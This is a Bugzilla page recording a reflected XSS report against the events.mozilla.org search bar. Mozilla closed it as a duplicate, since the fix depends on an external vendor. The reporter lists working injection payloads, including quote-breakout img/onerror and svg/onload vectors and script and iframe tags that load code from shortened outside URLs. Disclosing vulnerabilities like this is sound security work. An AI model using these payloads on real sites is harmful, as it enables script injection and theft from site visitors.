Closed Bug 1224857 Opened 10 years ago Closed 10 years ago

events.mozilla.org reflected xss

Categories

(mozilla.org :: Security Assurance: Applications, task)

Product:
mozilla.org
Component:
Security Assurance: Applications
Type:
task
Priority:
Not set
Severity:
normal

Tracking

(Not tracked)

Status:
RESOLVED DUPLICATE of bug 1142658

People

(Reporter: muratyilmazlar1, Unassigned)

Details

Attachments

(1 file)

xss alert poc
101.98 KB, image/png
Details
Attached image xss alert poc
User Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 Build ID: 20151029151421 Steps to reproduce: Hey, I go to https://events.mozilla.org and I saw the search bar. And I tried some payloads like </script><script>alert(1)</script> <input onfocus="prompt(1)"> And I got nothing. But, when I tried to bypass it with '"> I was right. I tried few payloads which are begin with '"> and I was success. Here is some payloads: <script src=//goo.gl/TJnzmV> <iframe src=//goo.gl/xWYG4f> '"><img src=x onerror=alert(document.domain)> '"><svg/onload=confirm(document.domain)> These are working fine. Actual results: I got a xss pop-up alert box. And I was success about finding xss on website. Expected results: I got a xss pop-up alert box. And I was success about finding xss on website. I was expected to do it also.
Thank you for reporting this bug, murrat. The issue is already known, but the software is handled by an external vendor and we have to rely on them for updates. Please see the original issue for more.
Status: UNCONFIRMED → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
Group: mozilla-employee-confidential
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: